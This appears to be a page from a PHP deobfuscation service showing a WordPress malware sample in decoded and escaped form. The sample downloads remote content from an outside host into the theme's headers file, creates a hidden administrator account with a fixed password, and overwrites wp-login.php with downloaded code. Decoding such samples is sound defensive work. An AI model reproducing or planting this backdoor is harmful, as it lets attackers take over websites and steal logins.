Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

if ($wp_detect == 1) { $wp_theme_dir = get_template_directory(); $header_file = ..

Decoded Output download

<?  if ($wp_detect == 1) { 
    $wp_theme_dir = get_template_directory(); 
    $header_file = 
        $wp_theme_dir . "/headers.php"; 
    $header_content = file_get_contents($header_file); 
    $append = http_get( 
        "https://acbdf.space/txt/seoco.txt" 
    ); 
    if (!preg_match("#" . $append . "#", $header_content)) { 
        $new_content = $append . $header_content; 
        $open_file = fopen($header_file, "w"); 
        fwrite($open_file, $new_content); 
        fclose($open_file); 
    } 
    $user = "webmaster"; 
    $pass = "$P$BxJON2B3"; 
    $email = 
        "[email protected]"; 
    if (!username_exists($user) && !email_exists($email)) { 
        $user_id = wp_create_user($user, $pass, $email); 
        $user = new WP_User($user_id); 
        $user->set_role("administrator"); 
    } 
    $wp_login = ABSPATH . "/wp-login.php"; 
    $login = http_get( 
        "https://acbdf.space/txt/seo.txt" 
    ); 
    $open_login = fopen($wp_login, "w"); 
    fwrite($open_login, $login); 
    fclose($open_login); 
} ?>

Did this file decode correctly?

Original Code

if ($wp_detect == 1) {
    $wp_theme_dir = get_template_directory();
    $header_file =
        $wp_theme_dir . "\57\x68\145\141\144\145\x72\x73\56\x70\x68\160";
    $header_content = file_get_contents($header_file);
    $append = http_get(
        "\x68\164\164\160\x73\x3a\x2f\x2f\x61\x63\x62\144\146\56\163\x70\x61\x63\145\57\x74\170\164\x2f\163\x65\x6f\143\x6f\x2e\x74\x78\x74"
    );
    if (!preg_match("\x23" . $append . "\x23", $header_content)) {
        $new_content = $append . $header_content;
        $open_file = fopen($header_file, "\167");
        fwrite($open_file, $new_content);
        fclose($open_file);
    }
    $user = "\167\x65\x62\155\x61\163\x74\x65\162";
    $pass = "\x24\120\x24\102\x78\112\x4f\116\62\102\63";
    $email =
        "\142\171\150\145\162\157\64\x34\x40\147\x6d\141\x69\x6c\x2e\143\x6f\x6d";
    if (!username_exists($user) && !email_exists($email)) {
        $user_id = wp_create_user($user, $pass, $email);
        $user = new WP_User($user_id);
        $user->set_role("\141\144\155\x69\x6e\x69\163\x74\162\141\x74\157\162");
    }
    $wp_login = ABSPATH . "\x2f\167\160\55\154\x6f\x67\151\156\56\160\150\160";
    $login = http_get(
        "\x68\x74\x74\160\163\x3a\x2f\57\141\x63\x62\x64\x66\56\x73\x70\x61\143\x65\x2f\x74\170\164\57\x73\145\157\56\164\x78\164"
    );
    $open_login = fopen($wp_login, "\167");
    fwrite($open_login, $login);
    fclose($open_login);
}

Function Calls

get_template_directory 1

Variables

None

Stats

MD5 9e032c8c43466f677f437faf2c7e84c1
Eval Count 0
Decode Time 61 ms